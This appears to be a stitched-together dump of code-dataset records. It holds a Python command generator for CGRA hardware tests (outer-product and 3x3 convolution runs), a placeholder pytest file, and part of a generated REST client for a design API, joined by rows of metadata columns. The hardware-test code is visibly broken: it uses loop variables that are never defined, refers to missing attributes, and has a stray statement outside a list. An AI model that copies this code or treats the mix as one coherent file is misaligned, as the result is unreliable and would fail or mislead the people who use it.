# *gc_config_bitstream(self.bitstream),
*gb_config_bitstream(self.bitstream, width=self.args.width),
PRINT("Done."),
# # TODO: Do it again to test the interrupts, but remove later.
# PRINT("Configuring CGRA..."),
# # *gc_config_bitstream(self.bitstream),
# *gb_config_bitstream(self.bitstream, width=self.args.width),
# PRINT("Done."),
]
in_addrs = [ BANK_ADDR(0) + 2048 * (k % 2) for k in range(len(ims)) ]
out_addrs = [ BANK_ADDR(16) + 2048 * (k % 2) for k in range(len(golds)) ]
for k in range(len(ims)):
command_list += [
PRINT(f"Loading input {k}..."),
WRITE_DATA(in_addrs[k], 0xc0ffee, ims[k].nbytes, ims[k]),
*configure_io(IO_INPUT_STREAM, in_addrs[k], len(ims[k]), width=self.args.width),
*configure_io(IO_OUTPUT_STREAM, out_addrs[k], len(golds[k]), io_ctrl=1, width=self.args.width),
]
if k == 0:
command_list += [
WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1),
WRITE_REG(STALL_REG, 0),
PEND(0b01, f"start"),
WRITE_REG(CGRA_START_REG, 1),
]
else:
command_list += [
WRITE_REG(CGRA_AUTO_RESTART_REG, 1),
PRINT(f"Waiting on {k-1}..."),
WAIT(0b01, f"start"),
PRINT(f"Reading output {k-1}..."),
READ_DATA(
out_addrs[k-1],
golds[k-1].nbytes,
golds[k-1],
_file=self.outfiles[k],
),
]
command_list += [
PRINT(f"Waiting on {len(golds)-1}..."),
WAIT(0b01, f"start"),
PRINT(f"Reading output {len(golds)-1}..."),
READ_DATA(
out_addrs[len(golds)-1],
golds[len(golds)-1].nbytes,
golds[len(golds)-1],
_file=self.outfiles[k],
),
PRINT("All tasks complete!"),
]
return command_list
def verify(self, results=None):
print("Comparing outputs...")
golds = [
np.fromfile(
self.goldfiles[k],
dtype=np.uint8,
)
for k in range(len(self.goldfiles))
]
if results is None:
results = [
np.fromfile(
self.outfiles[k],
dtype=np.uint16,
).astype(np.uint8)
for k in range(len(self.outfiles))
]
for gold, result in zip(golds, results):
if not np.array_equal(gold, result):
if len(gold) != len(result):
print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
for k, (x, y) in enumerate(zip(gold, result)):
if x != y:
print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
return False
print("Outputs match!")
return True
class OuterProduct():
def __init__(self, bitstream, weightfiles, infiles, goldfile, outfile, args):
self.bitstream = bitstream
self.weightfiles = weightfiles
self.infiles = infiles
self.goldfile = goldfile
self.outfile = outfile
self.args = args
def commands(self):
wts = [
np.fromfile(
weightfile,
dtype=np.uint8
).astype(np.uint16)
for weightfile in self.weightfiles
]
ims = [
np.fromfile(
infile,
dtype=np.uint8
).astype(np.uint16)
for infile in self.infiles
]
gold = np.fromfile(
goldfile,
dtype=np.uint8
).astype(np.uint16)
command_list = [
WRITE_REG(GLOBAL_RESET_REG, 1),
# Stall the CGRA
WRITE_REG(STALL_REG, 0b1111),
# Enable interrupts
WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
# Configure the CGRA
PRINT("Configuring CGRA..."),
# *gc_config_bitstream(self.bitstream),
*gb_config_bitstream(self.bitstream, width=self.args.width),
PRINT("Done."),
]
# Load weights to consecutive memory in global buffer
wt_addr = BANK_ADDR(0)
wt_len = 0
for wt in wts:
command_list += [
PRINT(f"Loading weight {k}..."),
WRITE_DATA(wt_addr, 0xc0ffee, wt.nbytes, wt),
]
wt_addr += wt.nbytes
wt_len += len(wt)
# Load images to consecutive memory in global buffer
im_addr = BANK_ADDR(4)
im_len = 0
for im in ims:
command_list += [
PRINT(f"Loading weight {k}..."),
WRITE_DATA(im_addr, 0xc0ffee, im.nbytes, im),
]
im_addr += im.nbytes
im_len += len(im)
command_list += [
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0), len(wts[0]), width=self.args.width),
*configure_io(IO_INPUT_STREAM, BANK_ADDR(4), im_len, width=self.args.width),
*configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
# Run the application
PRINT("Starting application..."),
WRITE_REG(STALL_REG, 0),
PEND(0b01, "start"),
WRITE_REG(CGRA_START_REG, 1),
# PRINT("Waiting for completion..."),
# PRINT("Done."),
]
# c code
# wait until semaphore == 0
# disable interrupts
# signal semaphore
# auto_restart = 1
# enable interrupts
# interrupt handler
# if semaphore > 0
# if auto_restart == 1
# auto_restart = 0
# cgra_start = 1
# decrement semaphore
for k in range(1, len(wts)):
command_list += [
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0) + k*len(wts[0]), len(wts[k]), width=self.args.width),
*configure_io(IO_INPUT_STREAM, BANK_ADDR(4), im_len, width=self.args.width),
WRITE_REG(CGRA_AUTO_RESTART_REG, 1),
WAIT(0b01, "start"),
]
command_list += [
WAIT(0b01, "start"),
PRINT("Reading output data..."),
READ_DATA(
BANK_ADDR(16),
gold.nbytes,
gold,
_file=self.outfile,
),
PRINT("All tasks complete!"),
]
return command_list
def verify(self, results=None):
print("Comparing outputs...")
gold = np.fromfile(
self.goldfiles,
dtype=np.uint8,
)
if results is None:
result = np.fromfile(
self.outfile,
dtype=np.uint16,
).astype(np.uint8)
if not np.array_equal(gold, result):
if len(gold) != len(result):
print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
for k, (x, y) in enumerate(zip(gold, result)):
if x != y:
print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
return False
print("Outputs match!")
return True
class Conv3x3ReLU():
def __init__(self, bitstream, weightfiles, infiles, goldfile, outfile, args):
self.bitstream = bitstream
self.weightfiles = weightfiles
self.infiles = infiles
self.goldfile = goldfile
self.outfile = outfile
self.args = args
def commands(self):
wts = [
np.fromfile(
weightfile,
dtype=np.uint8
).astype(np.uint16)
for weightfile in self.weightfiles
]
ims = [
np.fromfile(
infile,
dtype=np.uint8
).astype(np.uint16)
for infile in self.infiles
]
gold = np.fromfile(
goldfile,
dtype=np.uint8
).astype(np.uint16)
command_list = [
WRITE_REG(GLOBAL_RESET_REG, 1),
# Stall the CGRA
WRITE_REG(STALL_REG, 0b1111),
# Enable interrupts
WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
# Configure the CGRA
PRINT("Configuring CGRA..."),
# *gc_config_bitstream(self.bitstream),
*gb_config_bitstream(self.bitstream, width=self.args.width),
PRINT("Done."),
]
# Load weights to consecutive memory in global buffer
wt_addr = BANK_ADDR(4)
wt_len = 0
for wt in wts:
command_list += [
PRINT(f"Loading weight {k}..."),
WRITE_DATA(wt_addr, 0xc0ffee, wt.nbytes, wt),
]
wt_addr += wt.nbytes
wt_len += len(wt)
# Load images to consecutive memory in global buffer
im_addr = BANK_ADDR(0)
im_len = 0
for im in ims:
command_list += [
PRINT(f"Loading weight {k}..."),
WRITE_DATA(im_addr, 0xc0ffee, im.nbytes, im),
]
im_addr += im.nbytes
im_len += len(im)
in_chan = 64
out_chan = 64
in_x = 16
in_y = 16
out_x = 14
out_y = 14
for k in range(0, out_x * out_y):
for j in range(0, 9):
img_y = k + j // 3 - 1
img_x = k + j % 3 - 1
command_list += [
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0) + (img_y * in_x + img_x) * in_chan, in_chan, width=self.args.width),
]
for i in range(0, out_chan):
command_list += [
*configure_io(IO_INPUT_STREAM, BANK_ADDR(4) + j * out_chan * in_chan + i * in_chan, in_chan, width=self.args.width),
]
if i == 0 and j == 0 and k == 0:
command_list += [
*configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
# Run the application
PRINT("Starting application..."),
WRITE_REG(STALL_REG, 0),
PEND(0b01, "start"),
WRITE_REG(CGRA_START_REG, 1),
# PRINT("Waiting for completion..."),
# PRINT("Done."),
]
else:
command_list += [
WRITE_REG(CGRA_AUTO_RESTART_REG, 1), WAIT(0b01, "start"), ]
WAIT(0b01, "start"),
command_list += [
WAIT(0b01, "start"),
PRINT("Reading output data..."),
READ_DATA(
BANK_ADDR(16),
gold.nbytes,
gold,
_file=self.outfile,
),
PRINT("All tasks complete!"),
]
return command_list
def verify(self, results=None):
print("Comparing outputs...")
gold = np.fromfile(
self.goldfiles,
dtype=np.uint8,
)
if results is None:
result = np.fromfile(
self.outfile,
dtype=np.uint16,
).astype(np.uint8)
if not np.array_equal(gold, result):
if len(gold) != len(result):
print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
for k, (x, y) in enumerate(zip(gold, result)):
if x != y:
print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
return False
print("Outputs match!")
return True
| 32.730897
| 140
| 0.494265
| 2,143
| 19,704
| 4.380308
| 0.085394
| 0.034942
| 0.036007
| 0.049856
| 0.891659
| 0.875573
| 0.865985
| 0.852775
| 0.826888
| 0.805476
| 0
| 0.026168
| 0.394894
| 19,704
| 601
| 141
| 32.785358
| 0.761134
| 0.141849
| 0
| 0.778555
| 0
| 0
| 0.079555
| 0
| 0
| 0
| 0.003332
| 0.001664
| 0
| 0
| null | null | 0
| 0.004662
| null | null | 0.037296
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d6ff40decdf406f358c0237bc8d07335924c92b
| 129
|
py
|
Python
|
test_nothing.py
|
yaleman/ha_mqtt_gpio
|
6fa2f8847ccca277805d311945fa0460b8e67b28
|
[
"MIT"
] | null | null | null |
test_nothing.py
|
yaleman/ha_mqtt_gpio
|
6fa2f8847ccca277805d311945fa0460b8e67b28
|
[
"MIT"
] | null | null | null |
test_nothing.py
|
yaleman/ha_mqtt_gpio
|
6fa2f8847ccca277805d311945fa0460b8e67b28
|
[
"MIT"
] | null | null | null |
""" tests nothing, makes pytest happy """
def test_nothing():
"""tests nothing, just makes pytest happy"""
assert True
| 18.428571
| 48
| 0.658915
| 16
| 129
| 5.25
| 0.625
| 0.285714
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209302
| 129
| 6
| 49
| 21.5
| 0.823529
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d97002cd191b044728e5c57a44ac1c10e5b2b08
| 418,086
|
py
|
Python
|
TweakApi/apis/design_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/design_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/design_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
tweak-api
Tweak API to integrate with all the Tweak services. You can find out more about Tweak at <a href='https://www.tweak.com'>https://www.tweak.com</a>, #tweak.
OpenAPI spec version: 1.0.8-beta.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DesignApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def designs_change_stream_get(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_change_stream_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_change_stream_get_with_http_info(**kwargs)
else:
(data) = self.designs_change_stream_get_with_http_info(**kwargs)
return data
def designs_change_stream_get_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_change_stream_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_change_stream_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/Designs/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'options' in params:
query_params['options'] = params['options']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_change_stream_post(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_change_stream_post(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_change_stream_post_with_http_info(**kwargs)
else:
(data) = self.designs_change_stream_post_with_http_info(**kwargs)
return data
def designs_change_stream_post_with_http_info(self, **kwargs):
"""
Create a change stream.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_change_stream_post_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str options:
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['options']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_change_stream_post" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/Designs/change-stream'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
if 'options' in params:
form_params.append(('options', params['options']))
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_count_get(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_count_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_count_get_with_http_info(**kwargs)
else:
(data) = self.designs_count_get_with_http_info(**kwargs)
return data
def designs_count_get_with_http_info(self, **kwargs):
"""
Count instances of the model matched by where from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_count_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_count_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/Designs/count'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_find_one_get(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_find_one_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_find_one_get_with_http_info(**kwargs)
else:
(data) = self.designs_find_one_get_with_http_info(**kwargs)
return data
def designs_find_one_get_with_http_info(self, **kwargs):
"""
Find first instance of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_find_one_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_find_one_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/Designs/findOne'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_get(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_get(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[Design]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_get_with_http_info(**kwargs)
else:
(data) = self.designs_get_with_http_info(**kwargs)
return data
def designs_get_with_http_info(self, **kwargs):
"""
Find all instances of the model matched by filter from the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_get_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter: Filter defining fields, where, include, order, offset, and limit - must be a JSON-encoded string ({\"something\":\"value\"})
:return: list[Design]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/Designs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Design]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_approve_post(self, id, id2, **kwargs):
"""
Approve design
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_approve_post(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_approve_post_with_http_info(id, id2, **kwargs)
else:
(data) = self.designs_id_approve_post_with_http_info(id, id2, **kwargs)
return data
def designs_id_approve_post_with_http_info(self, id, id2, **kwargs):
"""
Approve design
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_approve_post_with_http_info(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'id2']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_approve_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_approve_post`")
# verify the required parameter 'id2' is set
if ('id2' not in params) or (params['id2'] is None):
raise ValueError("Missing the required parameter `id2` when calling `designs_id_approve_post`")
collection_formats = {}
resource_path = '/Designs/{id}/approve'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'id2' in params:
path_params['id'] = params['id2']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_assignee_get(self, id, **kwargs):
"""
Fetches belongsTo relation assignee.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_assignee_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_assignee_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_assignee_get_with_http_info(id, **kwargs)
return data
def designs_id_assignee_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation assignee.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_assignee_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_assignee_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_assignee_get`")
collection_formats = {}
resource_path = '/Designs/{id}/assignee'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_commenters_count_get(self, id, **kwargs):
"""
Counts commenters of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_commenters_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_commenters_count_get_with_http_info(id, **kwargs)
return data
def designs_id_commenters_count_get_with_http_info(self, id, **kwargs):
"""
Counts commenters of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_commenters_count_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_commenters_count_get" % key
)
params[key] = val
del params['kwargs']
